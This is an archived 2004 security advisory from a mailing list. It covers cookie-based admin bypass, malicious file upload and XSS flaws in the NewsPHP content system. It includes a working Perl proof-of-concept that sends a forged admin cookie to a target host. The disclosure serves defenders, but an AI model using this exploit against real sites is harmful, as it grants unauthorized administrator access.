[UNIX] Multiple Vulnerabilities in NewsPHP (Admin Privileges, File Upload, XSS)

• Previous message: SecuriTeam: "[EXPL] Solaris Kernel Module Insertion Exploit"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 14 Apr 2004 09:20:35 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Multiple Vulnerabilities in NewsPHP (Admin Privileges, File Upload, XSS)
------------------------------------------------------------------------

SUMMARY

" <http://www.newsphp.com/> NewsPHP is a perfect solution for creating web
publishing system, like an online magazine, newspaper, TV/Radio or news
portals. It works also as a Content Management System that is easy to
install and manage without having to FTP upload your pages every time you
need to update it". Several vulnerabilities in newsPHP allow a remote
attacker to gain administrator rights on newsPHP, run arbitrary code and
perform XSS attacks.

DETAILS

Cookie Vulnerability:
This flaw is caused due to improper administrator rights check (found in
the cookie's data).

File Upload vulnerability:
Due to improper sanity checks a privileged user can upload executable code
instead of a video in the Administration Panel.

Cross-Site Scripting:
A remote user can conduct a cross-site scripting attack due to an input
validation flaw done to the cat_id variable.

Example:
http://vulnerablehost/index.php?cat_id=[XSS code]

Vendor Status:
Vendor was contacted on Apr 3 2004

Proof of Concept:
The following is a proof of concept code for the cookie vulnerability:

#!/usr/bin/perl -w
## Example: POCnws.pl www.vulnerweb.com newsadmin POCnws.htm

use IO::Socket;
if (@ARGV < 3)
{
print "\n\n";
print "PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP)\n\n";
print "Usage: POCnws.pl [host] [directory] [file.htm]\n\n";
print "By: Manuel Lopez mantra at gulo.org\n";
print "\n\n";
exit(1);
}

$host = $ARGV[0];
$directorio = $ARGV[1];
$fichero = $ARGV[2];

print "\n";
print "----- Conecting .. <====\n\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr =>
"$host",PeerPort => "80") || die "\$socket error $!";
print "====> Conected\n";
print "====> Sending Data .. \n";
$socket->print(<<fin) or die "write: $!";
GET http://$host/$directorio/ HTTP/1.0
Cookie: autorized=admin; root=admin

fin
print "====> OK\n";
print "====> Generating $fichero ...\n";
open( Result, ">$fichero");
print Result while <$socket>;
close Result;
##--------------------------

ADDITIONAL INFORMATION

The information has been provided by <mailto:mantra@gulo.org> Manuel
Lopez.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[EXPL] Solaris Kernel Module Insertion Exploit"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]